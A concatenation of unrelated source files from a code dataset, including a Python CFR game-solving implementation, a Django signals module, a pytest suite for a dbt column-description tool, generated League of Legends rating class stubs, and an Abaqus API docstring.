# Firstly, traverse tree to compute counterfactual regret for each player
# The regrets are recorded in traversal
for player_id in range(self.env.player_num):
self.env.reset()
self.traverse_tree(player_id)
# Update policy
self.update_policy()
def traverse_tree(self, player_id):
"""
if terminal node return utility = payoff
"""
if self.env.is_over():
return self.env.get_payoffs()
current_player = self.env.get_player_id()
# state_utility = v_σ
state_utility = np.zeros(self.env.player_num)
# obs = h, legal_actions = A(I)
obs, legal_actions = self.get_state(current_player)
if obs not in self.regrets:
# regret to be initialized as 0 for each action
self.regrets[obs] = np.zeros(self.env.action_num)
if obs not in self.average_policy:
# Average policy initialized as 0 for each legal state and action pair
self.average_policy[obs] = np.zeros(self.env.action_num)
# σ(I,.) = regret_matching(r_I)
self.policy[obs] = self.regret_matching(obs)
# action probs = σ(I,.)
action_probs = self.action_probs(obs, legal_actions, self.policy)
# if P(h) == i
if current_player == player_id:
# Let u be an array indexed by actions and u_σ <- 0
action_utility = {}
state_utility = np.zeros(self.env.player_num)
for action in legal_actions:
action_prob = action_probs[action]
self.env.step(action)
# u[a] <- ExternalSampling(ha,i)
utility = self.traverse_tree(player_id)
action_utility[action] = utility
self.env.step_back()
# u_σ += σ(I,a) * u[a]
state_utility += action_prob * utility
for action in legal_actions:
# player_state_utility = v_σ
player_state_utility = state_utility[current_player]
# r(I,a) <- u[a] - u_σ
regret = (
action_utility[action][current_player]
- state_utility[current_player]
)
# r_I[a] += r(I,a)
self.regrets[obs][action] += regret
return state_utility
# if P(h) != i:
else:
# sample one single action
sampled_action = random.choice(legal_actions)
self.env.step(sampled_action)
utility = self.traverse_tree(player_id)
self.env.step_back()
for action in legal_actions:
# s_I[a] += σ(I,a)
self.average_policy[obs][action] += action_probs[action]
return utility
def regret_matching(self, obs):
"""Regret Matching using
{ R^T,+(I,a) / Σ_a (R)^T,+(I,a) if Σ_a (R)^T,+(I,a)>0
σ^(T+1) (I,a) = {
{ 1/|A(I)| else
Args:
obs (string):
Returns:
action_probability
"""
regret = self.regrets[obs]
# positive_regret_sum = Σ_a (R)^T,+(I,a)
positive_regret_sum = sum([r for r in regret if r > 0])
# action probs = σ^T+1 (I,.)
action_probs = np.zeros(self.env.action_num)
if positive_regret_sum > 0:
for action in range(self.env.action_num):
# σ^T+1 (I,a) = R^T,+(I,a) / Σ_a (R)^T,+(I,a)
action_probs[action] = max(0.0, regret[action] / positive_regret_sum)
else:
for action in range(self.env.action_num):
# σ^T+1 (I,a) = 1/|A(I)|
action_probs[action] = 1.0 / self.env.action_num
return action_probs
def update_policy(self):
"""Update policy based on the current regrets"""
for obs in self.regrets:
self.policy[obs] = self.regret_matching(obs)
def action_probs(self, obs, legal_actions, policy):
"""Obtain the action probabilities of the current state
Args:
obs (str): state_str
legal_actions (list): List of leagel actions
player_id (int): The current player
policy (dict): The used policy
Returns:
(tuple) that contains:
action_probs(numpy.array): The action probabilities
legal_actions (list): Indices of legal actions
"""
if obs not in policy.keys():
action_probs = np.array(
[1.0 / self.env.action_num for _ in range(self.env.action_num)]
)
self.policy[obs] = action_probs
else:
action_probs = policy[obs]
action_probs = remove_illegal(action_probs, legal_actions)
return action_probs
def eval_step(self, state):
"""Given a state, predict action based on average policy
Args:
state (numpy.array): State representation
Returns:
action (int): Predicted action
"""
probs = self.action_probs(
state["obs"].tostring(), state["legal_actions"], self.average_policy
)
action = np.random.choice(len(probs), p=probs)
return action, probs
def get_state(self, player_id):
"""Get state_str of the player
Args:
player_id (int): The player id
Returns:
(tuple) that contains:
state (str): The state str
legal_actions (list): Indices of legal actions
"""
state = self.env.get_state(player_id)
return state["obs"].tostring(), state["legal_actions"]
def save(self):
"""Save model"""
if not os.path.exists(self.model_path):
os.makedirs(self.model_path)
policy_file = open(os.path.join(self.model_path, "policy.pkl"), "wb")
pickle.dump(self.policy, policy_file)
policy_file.close()
average_policy_file = open(
os.path.join(self.model_path, "average_policy.pkl"), "wb"
)
pickle.dump(self.average_policy, average_policy_file)
average_policy_file.close()
regrets_file = open(os.path.join(self.model_path, "regrets.pkl"), "wb")
pickle.dump(self.regrets, regrets_file)
regrets_file.close()
iteration_file = open(os.path.join(self.model_path, "iteration.pkl"), "wb")
pickle.dump(self.iteration, iteration_file)
iteration_file.close()
def load(self):
"""Load model"""
if not os.path.exists(self.model_path):
return
policy_file = open(os.path.join(self.model_path, "policy.pkl"), "rb")
self.policy = pickle.load(policy_file)
policy_file.close()
average_policy_file = open(
os.path.join(self.model_path, "average_policy.pkl"), "rb"
)
self.average_policy = pickle.load(average_policy_file)
average_policy_file.close()
regrets_file = open(os.path.join(self.model_path, "regrets.pkl"), "rb")
self.regrets = pickle.load(regrets_file)
regrets_file.close()
iteration_file = open(os.path.join(self.model_path, "iteration.pkl"), "rb")
self.iteration = pickle.load(iteration_file)
iteration_file.close()
class OutcomeSampling_CFR:
"""Implementation of Outcome Sampling CFR algorithm
Initialize:∀I∈I:cI ←0
Initialize: ∀I ∈ I,∀a ∈ A(I) : rI[a] ← sI[a] ← 0
OutcomeSampling(h, i, t, πi, π−i, s):
if h ∈ Z then return (ui(h)/s, 1)
if P (h) = c then sample a′ and return OutcomeSampling(ha′ , i, t, πi , π−i , s)
Let I be the information set containing h
σ(I) ← RegretMatching(rI )
Let σ′(I) be a sampling distribution at I
if P(I)=ithenσ′(I)←ε·Unif(I)+(1−ε)σ(I)
else σ′(I) ← σ(I)
Sample an action a′ with probability σ′(I, a)
if P(I)=i then
(u, πtail) ← OutcomeSampling(ha′, i, t, πi · σ(I, a), π−i, s · σ′(I, a))
for a ∈ A(I) do
W ← u · π−i
Compute r ̃(I,a) from Equation 4.12 ifa=a′ else Equation4.15
r I [ a ] ← r I [ a ] + r ̃ ( I , a )
else
(u, πtail) ← OutcomeSampling(ha′, i, t, πi, π−i · σ(I, a), s · σ′(I, a))
for a ∈ A(I) do
sI[a]←sI[a]+(t−cI)·π−i ·σ(I,a)
cI ← t
return (u, πtail · σ(I, a))
"""
def __init__(self, env, epsilon = 0.5, model_path="./OutcomeSampling_cfr_model"):
"""Initialize Model
Args:
env : Env Class
model_path (str, optional): [description]. Defaults to './OutcomeSampling_cfr_model'.
"""
self.use_raw = False
self.env = env
self.model_path = model_path
# Policy = σ
# A policy is a dict state_str -> action probability
self.policy = collections.defaultdict(list)
# average_policy = s
self.average_policy = collections.defaultdict(np.array)
# Regret is a dict state_str -> action regrets
self.regrets = collections.defaultdict(np.array)
# counter for each Information set
self.counter = {}
self.epsilon = epsilon
self.iteration = 0
def train(self):
""" One iteration of CRF"""
self.iteration += 1
# Firstly, traverse tree to compute counterfactual regret for each player
# The regrets are recorded in traversal
for player_id in range(self.env.player_num):
self.env.reset()
# probs = [π_i,π_-i]
probs = np.ones(self.env.player_num)
s = 1
self.traverse_tree(probs, player_id, s)
# Update policy
self.update_policy()
def traverse_tree(self, probs, player_id, s):
"""
if terminal node return utility = payoff
"""
if self.env.is_over():
return (self.env.get_payoffs() / s, 1)
current_player = self.env.get_player_id()
next_player = int(not (current_player))
# state_utility = v_σ
state_utility = np.zeros(self.env.player_num)
# obs = h, legal_actions = A(I)
obs, legal_actions = self.get_state(current_player)
if obs not in self.regrets:
# regret to be initialized as 0 for each action
self.regrets[obs] = np.zeros(self.env.action_num)
if obs not in self.average_policy:
# Average policy initialized as 0 for each legal state and action pair
self.average_policy[obs] = np.zeros(self.env.action_num)
if obs not in self.counter.keys():
self.counter[obs] = 0
# σ(I,.) = regret_matching(r_I)
self.policy[obs] = self.regret_matching(obs)
# action probs = σ(I,.)
action_probs = self.action_probs(obs, legal_actions, self.policy)
if current_player == player_id:
sampling_dist = (
self.epsilon
* remove_illegal(np.ones(self.env.action_num), legal_actions)
/ self.env.action_num
) + (1 - self.epsilon) * (action_probs)
else:
sampling_dist = action_probs
sampled_action = np.random.choice(
range(self.env.action_num), p=remove_illegal(sampling_dist, legal_actions)
)
if current_player == player_id:
# action prob = σ(I,a)
action_prob = action_probs[sampled_action]
new_probs = probs.copy()
# σ(I,a) * π
new_probs[current_player] *= action_prob
self.env.step(sampled_action)
(u, pi_tail) = self.traverse_tree(
new_probs, player_id, s * sampling_dist[sampled_action]
)
self.env.step_back()
for action in legal_actions:
W = u * probs[next_player]
if action == sampled_action:
# W ·(πσ(z[I]a,z)−πσ(z[I],z))
regret = W[current_player] * (pi_tail - probs[current_player])
else:
regret = -1 * W[current_player] * probs[current_player]
self.regrets[obs][action] += regret
else:
# action prob = σ(I,a)
action_prob = action_probs[sampled_action]
new_probs = probs.copy()
# σ(I,a) * π
new_probs[current_player] *= action_prob
self.env.step(sampled_action)
(u, pi_tail) = self.traverse_tree(
new_probs, player_id, s * sampling_dist[sampled_action]
)
self.env.step_back()
for action in legal_actions:
self.average_policy[obs][action] += (
(self.iteration - self.counter[obs]) * probs[next_player] * action_prob
)
self.counter[obs] = self.iteration
return (u, pi_tail * action_prob)
def regret_matching(self, obs):
"""Regret Matching using
{ R^T,+(I,a) / Σ_a (R)^T,+(I,a) if Σ_a (R)^T,+(I,a)>0
σ^(T+1) (I,a) = {
{ 1/|A(I)| else
Args:
obs (string):
Returns:
action_probability
"""
regret = self.regrets[obs]
# positive_regret_sum = Σ_a (R)^T,+(I,a)
positive_regret_sum = sum([r for r in regret if r > 0])
# action probs = σ^T+1 (I,.)
action_probs = np.zeros(self.env.action_num)
if positive_regret_sum > 0:
for action in range(self.env.action_num):
# σ^T+1 (I,a) = R^T,+(I,a) / Σ_a (R)^T,+(I,a)
action_probs[action] = max(0.0, regret[action] / positive_regret_sum)
else:
for action in range(self.env.action_num):
# σ^T+1 (I,a) = 1/|A(I)|
action_probs[action] = 1.0 / self.env.action_num
return action_probs
def update_policy(self):
"""Update policy based on the current regrets"""
for obs in self.regrets:
self.policy[obs] = self.regret_matching(obs)
def action_probs(self, obs, legal_actions, policy):
"""Obtain the action probabilities of the current state
Args:
obs (str): state_str
legal_actions (list): List of leagel actions
player_id (int): The current player
policy (dict): The used policy
Returns:
(tuple) that contains:
action_probs(numpy.array): The action probabilities
legal_actions (list): Indices of legal actions
"""
if obs not in policy.keys():
action_probs = np.array(
[1.0 / self.env.action_num for _ in range(self.env.action_num)]
)
self.policy[obs] = action_probs
else:
action_probs = policy[obs]
action_probs = remove_illegal(action_probs, legal_actions)
return action_probs
def eval_step(self, state):
"""Given a state, predict action based on average policy
Args:
state (numpy.array): State representation
Returns:
action (int): Predicted action
"""
probs = self.action_probs(
state["obs"].tostring(), state["legal_actions"], self.average_policy
)
action = np.random.choice(len(probs), p=probs)
return action, probs
def get_state(self, player_id):
"""Get state_str of the player
Args:
player_id (int): The player id
Returns:
(tuple) that contains:
state (str): The state str
legal_actions (list): Indices of legal actions
"""
state = self.env.get_state(player_id)
return state["obs"].tostring(), state["legal_actions"]
def save(self):
"""Save model"""
if not os.path.exists(self.model_path):
os.makedirs(self.model_path)
policy_file = open(os.path.join(self.model_path, "policy.pkl"), "wb")
pickle.dump(self.policy, policy_file)
policy_file.close()
average_policy_file = open(
os.path.join(self.model_path, "average_policy.pkl"), "wb"
)
pickle.dump(self.average_policy, average_policy_file)
average_policy_file.close()
regrets_file = open(os.path.join(self.model_path, "regrets.pkl"), "wb")
pickle.dump(self.regrets, regrets_file)
regrets_file.close()
iteration_file = open(os.path.join(self.model_path, "iteration.pkl"), "wb")
pickle.dump(self.iteration, iteration_file)
iteration_file.close()
def load(self):
"""Load model"""
if not os.path.exists(self.model_path):
return
policy_file = open(os.path.join(self.model_path, "policy.pkl"), "rb")
self.policy = pickle.load(policy_file)
policy_file.close()
average_policy_file = open(
os.path.join(self.model_path, "average_policy.pkl"), "rb"
)
self.average_policy = pickle.load(average_policy_file)
average_policy_file.close()
regrets_file = open(os.path.join(self.model_path, "regrets.pkl"), "rb")
self.regrets = pickle.load(regrets_file)
regrets_file.close()
iteration_file = open(os.path.join(self.model_path, "iteration.pkl"), "rb")
self.iteration = pickle.load(iteration_file)
iteration_file.close()
| 33.933174 | 97 | 0.558728 | 3,735 | 28,436 | 4.11004 | 0.059705 | 0.009902 | 0.030487 | 0.028141 | 0.866133 | 0.839685 | 0.823204 | 0.803791 | 0.793434 | 0.780601 | 0 | 0.004351 | 0.329195 | 28,436 | 837 | 98 | 33.973716 | 0.796121 | 0.284956 | 0 | 0.801034 | 0 | 0 | 0.028856 | 0.004398 | 0 | 0 | 0 | 0 | 0 | 1 | 0.077519 | false | 0 | 0.01292 | 0 | 0.157623 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7d0713f579099a56b99b1feb60add50d18e5acb1 | 137 | py | Python | wagtailcommerce/orders/signals.py | theplusagency/wagtail-commerce | 6047170f29199ccaf2778534976ab0970c2877e7 | [
"BSD-3-Clause"
] | null | null | null | wagtailcommerce/orders/signals.py | theplusagency/wagtail-commerce | 6047170f29199ccaf2778534976ab0970c2877e7 | [
"BSD-3-Clause"
] | null | null | null | wagtailcommerce/orders/signals.py | theplusagency/wagtail-commerce | 6047170f29199ccaf2778534976ab0970c2877e7 | [
"BSD-3-Clause"
] | null | null | null | from django.dispatch import Signal
order_paid = Signal(providing_args=['order'])
shipment_generated = Signal(providing_args=['order'])
| 22.833333 | 53 | 0.788321 | 17 | 137 | 6.117647 | 0.647059 | 0.288462 | 0.365385 | 0.461538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.087591 | 137 | 5 | 54 | 27.4 | 0.832 | 0 | 0 | 0 | 1 | 0 | 0.072993 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
7d3191ab8e52cc85f784dcc216c93aa1a5713e77 | 6,524 | py | Python | tests/unit/test_unify_column_description.py | jtalmi/pre-commit-dbt | 3e143f5d866f4f90425808c8c0be0b49024cb044 | [
"MIT"
] | 153 | 2021-02-01T14:59:19.000Z | 2022-03-25T06:29:39.000Z | tests/unit/test_unify_column_description.py | jtalmi/pre-commit-dbt | 3e143f5d866f4f90425808c8c0be0b49024cb044 | [
"MIT"
] | 48 | 2021-02-01T13:46:40.000Z | 2022-03-30T22:41:15.000Z | tests/unit/test_unify_column_description.py | jtalmi/pre-commit-dbt | 3e143f5d866f4f90425808c8c0be0b49024cb044 | [
"MIT"
] | 27 | 2021-02-05T21:07:56.000Z | 2022-03-01T15:18:25.000Z | import pytest
from pre_commit_dbt.unify_column_description import main
TESTS = ( # type: ignore
(
"""
version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_2
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_3
columns:
- name: test1
description: test1
- name: test2
description: test2
""",
1,
"""version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_2
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_3
columns:
- name: test1
description: test
- name: test2
description: test
""",
[],
),
(
"""
version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_2
columns:
- name: test1
description: test2
- name: test2
description: test
- name: same_col_desc_3
columns:
- name: test1
description: test1
- name: test2
description: test2
""",
1,
"""version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_2
columns:
- name: test1
description: test2
- name: test2
description: test
- name: same_col_desc_3
columns:
- name: test1
description: test1
- name: test2
description: test
""",
[],
),
(
"""
version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_2
columns:
- name: test1
description: test2
- name: test2
description: test
- name: same_col_desc_3
columns:
- name: test1
description: test1
- name: test2
description: test
""",
0,
"""
version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_2
columns:
- name: test1
description: test2
- name: test2
description: test
- name: same_col_desc_3
columns:
- name: test1
description: test1
- name: test2
description: test
""",
["--ignore", "test1"],
),
(
"""
version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_2
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_3
columns:
- name: test1
- name: test2
""",
1,
"""version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_2
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_3
columns:
- name: test1
description: test
- name: test2
description: test
""",
[],
),
(
"""
version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_2
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_3
columns:
- name: test1
description: test
- name: test2
description: test
""",
0,
"""
version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_2
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_3
columns:
- name: test1
description: test
- name: test2
description: test
""",
[],
),
)
@pytest.mark.parametrize(
("schema_yml", "expected_status_code", "expected_result", "ignore"), TESTS
)
def test_replace_column_description(
schema_yml, expected_status_code, expected_result, ignore, tmpdir
):
yml_file = tmpdir.join("schema.yml")
yml_file.write(schema_yml)
input_args = [str(yml_file)]
input_args.extend(ignore)
status_code = main(input_args)
result = yml_file.read_text("utf-8")
assert status_code == expected_status_code
assert expected_result == result
def test_replace_column_description_split(tmpdir):
schema_yml1 = """
version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
"""
schema_yml2 = """
version: 2
models:
- name: same_col_desc_2
columns:
- name: test1
description: test_bad
- name: test2
"""
schema_yml3 = """
version: 2
models:
- name: same_col_desc_3
columns:
- name: test1
description: test
- name: test2
"""
yml_file1 = tmpdir.join("schema1.yml")
yml_file2 = tmpdir.join("schema2.yml")
yml_file3 = tmpdir.join("schema3.yml")
yml_file1.write(schema_yml1)
yml_file2.write(schema_yml2)
yml_file3.write(schema_yml3)
input_args = [str(yml_file1), str(yml_file2), str(yml_file3)]
status_code = main(input_args)
assert status_code == 1
result1 = yml_file1.read_text("utf-8")
result2 = yml_file2.read_text("utf-8")
result3 = yml_file3.read_text("utf-8")
assert (
result1
== """
version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
"""
)
assert (
result2
== """version: 2
models:
- name: same_col_desc_2
columns:
- name: test1
description: test
- name: test2
description: test
"""
)
assert (
result3
== """version: 2
models:
- name: same_col_desc_3
columns:
- name: test1
description: test
- name: test2
description: test
"""
)
| 18.69341 | 78 | 0.57802 | 727 | 6,524 | 4.957359 | 0.088033 | 0.237236 | 0.237236 | 0.149834 | 0.824917 | 0.784961 | 0.784961 | 0.784961 | 0.758879 | 0.758879 | 0 | 0.03914 | 0.322502 | 6,524 | 348 | 79 | 18.747126 | 0.776244 | 0.001839 | 0 | 0.555556 | 0 | 0 | 0.383818 | 0 | 0 | 0 | 0 | 0 | 0.047619 | 1 | 0.015873 | false | 0 | 0.015873 | 0 | 0.031746 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
adb9d725e9cf9c398e2277200be1b0050664e55c | 6,545 | py | Python | loldib/getratings/models/NA/na_singed/na_singed_top.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_singed/na_singed_top.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_singed/na_singed_top.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | from getratings.models.ratings import Ratings
class NA_Singed_Top_Aatrox(Ratings):
pass
class NA_Singed_Top_Ahri(Ratings):
pass
class NA_Singed_Top_Akali(Ratings):
pass
class NA_Singed_Top_Alistar(Ratings):
pass
class NA_Singed_Top_Amumu(Ratings):
pass
class NA_Singed_Top_Anivia(Ratings):
pass
class NA_Singed_Top_Annie(Ratings):
pass
class NA_Singed_Top_Ashe(Ratings):
pass
class NA_Singed_Top_AurelionSol(Ratings):
pass
class NA_Singed_Top_Azir(Ratings):
pass
class NA_Singed_Top_Bard(Ratings):
pass
class NA_Singed_Top_Blitzcrank(Ratings):
pass
class NA_Singed_Top_Brand(Ratings):
pass
class NA_Singed_Top_Braum(Ratings):
pass
class NA_Singed_Top_Caitlyn(Ratings):
pass
class NA_Singed_Top_Camille(Ratings):
pass
class NA_Singed_Top_Cassiopeia(Ratings):
pass
class NA_Singed_Top_Chogath(Ratings):
pass
class NA_Singed_Top_Corki(Ratings):
pass
class NA_Singed_Top_Darius(Ratings):
pass
class NA_Singed_Top_Diana(Ratings):
pass
class NA_Singed_Top_Draven(Ratings):
pass
class NA_Singed_Top_DrMundo(Ratings):
pass
class NA_Singed_Top_Ekko(Ratings):
pass
class NA_Singed_Top_Elise(Ratings):
pass
class NA_Singed_Top_Evelynn(Ratings):
pass
class NA_Singed_Top_Ezreal(Ratings):
pass
class NA_Singed_Top_Fiddlesticks(Ratings):
pass
class NA_Singed_Top_Fiora(Ratings):
pass
class NA_Singed_Top_Fizz(Ratings):
pass
class NA_Singed_Top_Galio(Ratings):
pass
class NA_Singed_Top_Gangplank(Ratings):
pass
class NA_Singed_Top_Garen(Ratings):
pass
class NA_Singed_Top_Gnar(Ratings):
pass
class NA_Singed_Top_Gragas(Ratings):
pass
class NA_Singed_Top_Graves(Ratings):
pass
class NA_Singed_Top_Hecarim(Ratings):
pass
class NA_Singed_Top_Heimerdinger(Ratings):
pass
class NA_Singed_Top_Illaoi(Ratings):
pass
class NA_Singed_Top_Irelia(Ratings):
pass
class NA_Singed_Top_Ivern(Ratings):
pass
class NA_Singed_Top_Janna(Ratings):
pass
class NA_Singed_Top_JarvanIV(Ratings):
pass
class NA_Singed_Top_Jax(Ratings):
pass
class NA_Singed_Top_Jayce(Ratings):
pass
class NA_Singed_Top_Jhin(Ratings):
pass
class NA_Singed_Top_Jinx(Ratings):
pass
class NA_Singed_Top_Kalista(Ratings):
pass
class NA_Singed_Top_Karma(Ratings):
pass
class NA_Singed_Top_Karthus(Ratings):
pass
class NA_Singed_Top_Kassadin(Ratings):
pass
class NA_Singed_Top_Katarina(Ratings):
pass
class NA_Singed_Top_Kayle(Ratings):
pass
class NA_Singed_Top_Kayn(Ratings):
pass
class NA_Singed_Top_Kennen(Ratings):
pass
class NA_Singed_Top_Khazix(Ratings):
pass
class NA_Singed_Top_Kindred(Ratings):
pass
class NA_Singed_Top_Kled(Ratings):
pass
class NA_Singed_Top_KogMaw(Ratings):
pass
class NA_Singed_Top_Leblanc(Ratings):
pass
class NA_Singed_Top_LeeSin(Ratings):
pass
class NA_Singed_Top_Leona(Ratings):
pass
class NA_Singed_Top_Lissandra(Ratings):
pass
class NA_Singed_Top_Lucian(Ratings):
pass
class NA_Singed_Top_Lulu(Ratings):
pass
class NA_Singed_Top_Lux(Ratings):
pass
class NA_Singed_Top_Malphite(Ratings):
pass
class NA_Singed_Top_Malzahar(Ratings):
pass
class NA_Singed_Top_Maokai(Ratings):
pass
class NA_Singed_Top_MasterYi(Ratings):
pass
class NA_Singed_Top_MissFortune(Ratings):
pass
class NA_Singed_Top_MonkeyKing(Ratings):
pass
class NA_Singed_Top_Mordekaiser(Ratings):
pass
class NA_Singed_Top_Morgana(Ratings):
pass
class NA_Singed_Top_Nami(Ratings):
pass
class NA_Singed_Top_Nasus(Ratings):
pass
class NA_Singed_Top_Nautilus(Ratings):
pass
class NA_Singed_Top_Nidalee(Ratings):
pass
class NA_Singed_Top_Nocturne(Ratings):
pass
class NA_Singed_Top_Nunu(Ratings):
pass
class NA_Singed_Top_Olaf(Ratings):
pass
class NA_Singed_Top_Orianna(Ratings):
pass
class NA_Singed_Top_Ornn(Ratings):
pass
class NA_Singed_Top_Pantheon(Ratings):
pass
class NA_Singed_Top_Poppy(Ratings):
pass
class NA_Singed_Top_Quinn(Ratings):
pass
class NA_Singed_Top_Rakan(Ratings):
pass
class NA_Singed_Top_Rammus(Ratings):
pass
class NA_Singed_Top_RekSai(Ratings):
pass
class NA_Singed_Top_Renekton(Ratings):
pass
class NA_Singed_Top_Rengar(Ratings):
pass
class NA_Singed_Top_Riven(Ratings):
pass
class NA_Singed_Top_Rumble(Ratings):
pass
class NA_Singed_Top_Ryze(Ratings):
pass
class NA_Singed_Top_Sejuani(Ratings):
pass
class NA_Singed_Top_Shaco(Ratings):
pass
class NA_Singed_Top_Shen(Ratings):
pass
class NA_Singed_Top_Shyvana(Ratings):
pass
class NA_Singed_Top_Singed(Ratings):
pass
class NA_Singed_Top_Sion(Ratings):
pass
class NA_Singed_Top_Sivir(Ratings):
pass
class NA_Singed_Top_Skarner(Ratings):
pass
class NA_Singed_Top_Sona(Ratings):
pass
class NA_Singed_Top_Soraka(Ratings):
pass
class NA_Singed_Top_Swain(Ratings):
pass
class NA_Singed_Top_Syndra(Ratings):
pass
class NA_Singed_Top_TahmKench(Ratings):
pass
class NA_Singed_Top_Taliyah(Ratings):
pass
class NA_Singed_Top_Talon(Ratings):
pass
class NA_Singed_Top_Taric(Ratings):
pass
class NA_Singed_Top_Teemo(Ratings):
pass
class NA_Singed_Top_Thresh(Ratings):
pass
class NA_Singed_Top_Tristana(Ratings):
pass
class NA_Singed_Top_Trundle(Ratings):
pass
class NA_Singed_Top_Tryndamere(Ratings):
pass
class NA_Singed_Top_TwistedFate(Ratings):
pass
class NA_Singed_Top_Twitch(Ratings):
pass
class NA_Singed_Top_Udyr(Ratings):
pass
class NA_Singed_Top_Urgot(Ratings):
pass
class NA_Singed_Top_Varus(Ratings):
pass
class NA_Singed_Top_Vayne(Ratings):
pass
class NA_Singed_Top_Veigar(Ratings):
pass
class NA_Singed_Top_Velkoz(Ratings):
pass
class NA_Singed_Top_Vi(Ratings):
pass
class NA_Singed_Top_Viktor(Ratings):
pass
class NA_Singed_Top_Vladimir(Ratings):
pass
class NA_Singed_Top_Volibear(Ratings):
pass
class NA_Singed_Top_Warwick(Ratings):
pass
class NA_Singed_Top_Xayah(Ratings):
pass
class NA_Singed_Top_Xerath(Ratings):
pass
class NA_Singed_Top_XinZhao(Ratings):
pass
class NA_Singed_Top_Yasuo(Ratings):
pass
class NA_Singed_Top_Yorick(Ratings):
pass
class NA_Singed_Top_Zac(Ratings):
pass
class NA_Singed_Top_Zed(Ratings):
pass
class NA_Singed_Top_Ziggs(Ratings):
pass
class NA_Singed_Top_Zilean(Ratings):
pass
class NA_Singed_Top_Zyra(Ratings):
pass
| 15.695444 | 46 | 0.766692 | 972 | 6,545 | 4.736626 | 0.151235 | 0.209818 | 0.389661 | 0.479583 | 0.803432 | 0.803432 | 0 | 0 | 0 | 0 | 0 | 0 | 0.169748 | 6,545 | 416 | 47 | 15.733173 | 0.847258 | 0 | 0 | 0.498195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.498195 | 0.00361 | 0 | 0.501805 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 8 |
ade13e4077ce081f89dc245feed396e98908231e | 2,473 | py | Python | src/abaqus/PlotOptions/OdbDiagnosticAttempt.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | 7 | 2022-01-21T09:15:45.000Z | 2022-02-15T09:31:58.000Z | src/abaqus/PlotOptions/OdbDiagnosticAttempt.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | null | null | null | src/abaqus/PlotOptions/OdbDiagnosticAttempt.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | null | null | null | from abaqusConstants import *
class OdbDiagnosticAttempt:
"""The OdbDiagnosticAttempt object.
Attributes
----------
autoStabilize: Boolean
A boolean specifying the state of Auto-stablilization. This attribute is read-only.
isConverged: Boolean
A boolean specifying the state of convergence for the attempt. This attribute is
read-only.
isCutBack: Boolean
A boolean specifying the state of cutback. This attribute is read-only.
needsReordering: Boolean
A boolean specifying whether or not reordering is needed. This attribute is read-only.
numberOfCutbackDiagnostics: str
An int specifying the number of cutback diagnostics. This attribute is read-only.
numberOfIterations: str
An int specifying the number of iterations for the particular attempt. This attribute is
read-only.
numberOfSevereDiscontinuityIterations: str
An int specifying the number of iterations with severe discontinuities This attribute is
read-only.
size: str
A float specifying the size of the increment of the particular attempt. This attribute
is read-only.
Notes
-----
This object can be accessed by:
.. code-block:: python
import visualization
session.odbData[name].diagnosticData.steps[i].increments[i].attempts[i]
"""
